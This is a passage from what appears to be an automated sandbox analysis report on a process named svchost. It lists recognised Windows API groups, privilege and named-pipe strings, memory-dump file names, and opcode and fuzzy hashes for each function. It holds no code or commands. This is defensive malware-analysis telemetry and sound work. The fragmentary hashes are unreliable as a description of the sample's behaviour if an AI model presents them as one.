                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: __scrt_dllmain_crt_thread_attach__vcrt_uninitialize_locks__vcrt_uninitialize_ptd
                                      • String ID:
                                      • API String ID: 1208906642-0
                                      • Opcode ID: d4aef5e5459b75806afb1256d492625439a4beee7a9efb9b6a672efda55c4a8e
                                      • Instruction ID: 374ca93adbc40f53cd380ed2207bcec565db53c5c80f7d38bf1f69abdfd8d21f
                                      • Opcode Fuzzy Hash: d4aef5e5459b75806afb1256d492625439a4beee7a9efb9b6a672efda55c4a8e
                                      • Instruction Fuzzy Hash: 53E09954D0D243C4FEA82E6115162B926F02F66384F500178EC8ADA7C39E0E624F92A2
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: FileType
                                      • String ID:
                                      • API String ID: 3081899298-0
                                      • Opcode ID: 6cfa110d5cef1c62e08b81ac8735d8479bd886b62a52d4c4be8f8cb2197252d2
                                      • Instruction ID: ef497fd641ad695f8e141e55002c29f1c6f608ce9d66dee9301757111cb991dc
                                      • Opcode Fuzzy Hash: 6cfa110d5cef1c62e08b81ac8735d8479bd886b62a52d4c4be8f8cb2197252d2
                                      • Instruction Fuzzy Hash: 62D0C912909485C2E9146AA9985103C22B0BF42735FA40720D63ACA6E1CE1D9596A210
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: CurrentDirectory
                                      • String ID:
                                      • API String ID: 1611563598-0
                                      • Opcode ID: cd7659c9ddd24a77d48b55e72de66fd3dd5a193154eaa8ea857c6d2ede7f55eb
                                      • Instruction ID: 219a5f7ecc48d096ad27859a5891dbbd0232f03fc38a21f789414fb97b7dd8de
                                      • Opcode Fuzzy Hash: cd7659c9ddd24a77d48b55e72de66fd3dd5a193154eaa8ea857c6d2ede7f55eb
                                      • Instruction Fuzzy Hash: 4FC08C20F02502C2DA086F2ACA8102C23F0BB44B44F608035C90DC5120CE2DCC9A9300
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: AllocHeap
                                      • String ID:
                                      • API String ID: 4292702814-0
                                      • Opcode ID: 292f7c19bff47af04a46d1b5dfd17efd2d6056f18471c16cf3b34eddd24b4daf
                                      • Instruction ID: 35fc62d8e8e8b5eaa4f019c8b3d6936dcd4a7dc0d29de46db639cd67504c7736
                                      • Opcode Fuzzy Hash: 292f7c19bff47af04a46d1b5dfd17efd2d6056f18471c16cf3b34eddd24b4daf
                                      • Instruction Fuzzy Hash: BDF04F55B0A206C6FEA55F6195503B9F2F15F89B80F5C4430CD0DCE3C2EE1CE5894111
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: CloseHandle
                                      • String ID:
                                      • API String ID: 2962429428-0
                                      • Opcode ID: 88b333418fbb9a41aad7cb5c738162b265e1cd5aa5de0f0b1c7f33e5cf95fe78
                                      • Instruction ID: a244ecd7803d9d356960f9e84b06c31e5beab1042e6658d50f0707975518ad19
                                      • Opcode Fuzzy Hash: 88b333418fbb9a41aad7cb5c738162b265e1cd5aa5de0f0b1c7f33e5cf95fe78
                                      • Instruction Fuzzy Hash: D6F0A962A0868AD6FB248F70E44437936B1EB04B79F484334DE3E891D8CF2CD895C340
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: AllocHeap
                                      • String ID:
                                      • API String ID: 4292702814-0
                                      • Opcode ID: 0042b4a878b9b8c4ecf8a32c33e373efbfc6dc6c8c16e1fabcf80cd824422c21
                                      • Instruction ID: d3c556eb678fbc172b92c4d173bc1d91ef2101571f340481b74fee58aab6a44c
                                      • Opcode Fuzzy Hash: 0042b4a878b9b8c4ecf8a32c33e373efbfc6dc6c8c16e1fabcf80cd824422c21
                                      • Instruction Fuzzy Hash: D2F0F861F4D246C5FE645FA25951AB932F15F89BA0F884630DD2ECE3C1DE6CE5898210
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo_noreturn$wcscpy$CloseDirectoryFileHandleRemove$CreateErrorLast$Concurrency::cancel_current_taskControlCurrentDeleteDeviceProcess
                                      • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                      • API String ID: 938441313-3508440684
                                      • Opcode ID: f67eb2998188988e2b0a1f2570f8951e1953cc602bb9093486d56a6496ad84bc
                                      • Instruction ID: b6bb1e3fff8a363043f9ce28592a58c8162372fbf5e8184b742ba520df04743e
                                      • Opcode Fuzzy Hash: f67eb2998188988e2b0a1f2570f8951e1953cc602bb9093486d56a6496ad84bc
                                      • Instruction Fuzzy Hash: 84729E62F18686C6FB00DF78D4452BD33B1AB857A4F505331EE6D9AADADE38E585C300
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: NamePath$File_invalid_parameter_noinfo_noreturn$LongMoveShort$CompareCreateString
                                      • String ID: rtmp
                                      • API String ID: 3587137053-870060881
                                      • Opcode ID: 7db052c56a44bd0e381748e2d1090abdb697578b857e720ea9b89de431250ef8
                                      • Instruction ID: d1d87a8e56ccaa66072ee162582631f4b1eea0e42f23325b56ff4216c86bf388
                                      • Opcode Fuzzy Hash: 7db052c56a44bd0e381748e2d1090abdb697578b857e720ea9b89de431250ef8
                                      • Instruction Fuzzy Hash: FDF1AD22A08A86D6EB10DF65D4801FD77F1EB95794F501232EE4D9BAAADF3CE585C300
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: FullNamePath_invalid_parameter_noinfo_noreturn
                                      • String ID:
                                      • API String ID: 1693479884-0
                                      • Opcode ID: af6d3e4abd2a055a70f5e168263153ac329b7855e86384a56c25524d53e28e79
                                      • Instruction ID: e388a781027de65c7c892dae9438e8231d123631022531fa6791de0165680e19
                                      • Opcode Fuzzy Hash: af6d3e4abd2a055a70f5e168263153ac329b7855e86384a56c25524d53e28e79
                                      • Instruction Fuzzy Hash: 3491AD62F15B56C5FE009FB9D8445BD33F1AB89BA4B106235DE2D9BBC9DE3CE4818200
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo_noreturn
                                      • String ID:
                                      • API String ID: 3668304517-3916222277
                                      • Opcode ID: d00721000243fdef9c53e679a920a4edda61c50f747ad193ebda8997fb03b4d4
                                      • Instruction ID: 09af23ac0fddfebd8885c51fdf75737c5af680c68aa2632a1dfa1b1020715aa3
                                      • Opcode Fuzzy Hash: d00721000243fdef9c53e679a920a4edda61c50f747ad193ebda8997fb03b4d4
                                      • Instruction Fuzzy Hash: 5302C962F09B86C1EA10DF68D0401BD73B2BB94B98F505232DE6D9E7D9EF78E5858340
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                      • String ID:
                                      • API String ID: 3140674995-0
                                      • Opcode ID: 5d0c2cdb600253a112039d53f6e53d0d17808d24ed258e738d60e0abbf418c3f
                                      • Instruction ID: 017c7ccdf63882957978eb47b492c444869a05b7901c48e605112d748715757f
                                      • Opcode Fuzzy Hash: 5d0c2cdb600253a112039d53f6e53d0d17808d24ed258e738d60e0abbf418c3f
                                      • Instruction Fuzzy Hash: 1E311A76608B82CAEB609F64E8503E973B4FB84744F44443ADE4E8BB98DF78D649C710
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                      • String ID:
                                      • API String ID: 1239891234-0
                                      • Opcode ID: bfd67cc7913bb9c5daa93001e37a0d443e56d2534886e383b5bccabf986ee659
                                      • Instruction ID: d742d6ecc9ef8a76e8b7e13f5bfc6e70f2fb2661543842133d92a3d45a219620
                                      • Opcode Fuzzy Hash: bfd67cc7913bb9c5daa93001e37a0d443e56d2534886e383b5bccabf986ee659
                                      • Instruction Fuzzy Hash: 17313D36618B81C6DB648F25E8402AE73B4FB88758F540135EE9D87B99DF38D559CB00
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo_noreturn
                                      • String ID:
                                      • API String ID: 3668304517-0
                                      • Opcode ID: 01c9e1afa5f40b65f74732f47e984549462867107ffd409a88eb306ceec3fb4c
                                      • Instruction ID: 8549cb0272a82220b47ffb9f32b61a0e2538d13673d4a7caa809e1008d5b9a2c
                                      • Opcode Fuzzy Hash: 01c9e1afa5f40b65f74732f47e984549462867107ffd409a88eb306ceec3fb4c
                                      • Instruction Fuzzy Hash: D8B18F62A14A96A7EB109F65D8412BD33B1FB89798F405236EE5C8BB95DF2CE544C300
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo_noreturn
                                      • String ID:
                                      • API String ID: 3668304517-0
                                      • Opcode ID: c512cb65a9e4a9dfc141e7338469cd4b21cffa475f08b4dc819125c57d1eb1a1
                                      • Instruction ID: 010bcba42eb5fb29161851ff06aff0dea6b9f9f6d13f93c3850bc4177cae9032
                                      • Opcode Fuzzy Hash: c512cb65a9e4a9dfc141e7338469cd4b21cffa475f08b4dc819125c57d1eb1a1
                                      • Instruction Fuzzy Hash: 8CB1A063A18682C6FB20DF28D4412BD73B1EB85794F505231EE4D9BAAADF3CE585C700
                                      APIs
                                      • _invalid_parameter_noinfo.LIBCMT ref: 00007FF669ADEA04
                                        • Part of subcall function 00007FF669AD6884: GetCurrentProcess.KERNEL32(00007FF669ADFC0D), ref: 00007FF669AD68B1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                       • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: CurrentProcess_invalid_parameter_noinfo
                                      • String ID: *?$.
                                      • API String ID: 2518042432-3972193922
                                      • Opcode ID: 6c48adfc9562f552bab25e0627fbeed4785c1a74431500d895d15752767426cb
                                      • Instruction ID: 1233c660b31c2067f31ce5b714146e023a55c03e51d4dd8c7a69528df3502039
                                      • Opcode Fuzzy Hash: 6c48adfc9562f552bab25e0627fbeed4785c1a74431500d895d15752767426cb
                                      • Instruction Fuzzy Hash: 9051C062B14A96C5FF10DF6198000BCB7F5BB48BD8B548531DE1E9BB85DE3CE4468300
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                       • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: Create$EventNamedPipe
                                      • String ID: \\.\pipe\
                                      • API String ID: 412621846-91387939
                                      • Opcode ID: f3eebe51544f6fc9de6de0bc7f5d8c2c79a1f417ad19e936a21bebe7d5b8b42f
                                      • Instruction ID: 30109c732a668e8eff4a02ef57772116c68e0d20d821d49e49e356b4a0b094ba
                                      • Opcode Fuzzy Hash: f3eebe51544f6fc9de6de0bc7f5d8c2c79a1f417ad19e936a21bebe7d5b8b42f
                                      • Instruction Fuzzy Hash: 3E218872614781C6D710CF24E05036A77B0E7847A8F204325DEAD4A6E5DF3DD585CB40
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                       • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: ErrorFormatFreeLastLocalMessage
                                      • String ID:
                                      • API String ID: 1365068426-0
                                      • Opcode ID: a587a837c65065e08ac0ceaeee7012d7e9f34c86446267b0222f8841e56504d6
                                      • Instruction ID: 1aae8c7c27e0dc7a4928149b85fd0f94138cd4069bdf6d265c92c22a8e54c307
                                      • Opcode Fuzzy Hash: a587a837c65065e08ac0ceaeee7012d7e9f34c86446267b0222f8841e56504d6
                                      • Instruction Fuzzy Hash: 66F04972A18746C3EB208F22A41033A73F3AB85B96F040034DE4A8AA84CF3CD4059B00
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                       • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: .
                                      • API String ID: 0-248832578
                                      • Opcode ID: 93415719eb3e3f946296a88886e8804c53bcd324b38b44e42a0acaa7de3a1920
                                      • Instruction ID: 9f1fb78096ea01d55f5d5a72e5b3a344fa5a4c08f47b3a4b7935c12bef0463c2
                                      • Opcode Fuzzy Hash: 93415719eb3e3f946296a88886e8804c53bcd324b38b44e42a0acaa7de3a1920
                                      • Instruction Fuzzy Hash: A331FD21B0469185F7609F22E8057B9BAF1EB44BE4F548735DE5C8BBC5CE3CD5058304
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                       • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: FormatInfoLocaleNumber
                                      • String ID:
                                      • API String ID: 2169056816-0
                                      • Opcode ID: c59c861be7a078541e30cde009b828222bb83b28d91b2917d66e0be88f6e8dfa
                                      • Instruction ID: 3323c96efd0129bc5b5459fabf67633b7ed85df81da677f29bdc266998669a49
                                      • Opcode Fuzzy Hash: c59c861be7a078541e30cde009b828222bb83b28d91b2917d66e0be88f6e8dfa
                                      • Instruction Fuzzy Hash: AB114A22A18B85D5E7618F11E8403EA73B4FF88B48F844135DE8C8BA54EF7CD546C744
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                       • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: Version
                                      • String ID:
                                      • API String ID: 1889659487-0
                                      • Opcode ID: c411fd5ded362d50915c368b3c5811918dab1970b9969c2428285441b409caa2
                                      • Instruction ID: 537749756df7daa2202762daee5d5a1636d0ef9acff043077d85efee75ff0c73
                                      • Opcode Fuzzy Hash: c411fd5ded362d50915c368b3c5811918dab1970b9969c2428285441b409caa2
                                      • Instruction Fuzzy Hash: C7012C71A0C58AC5FAA15F60A4153BA37F0AF6A309F440134DD8C8F6AADF2CA448DA04
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                       • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
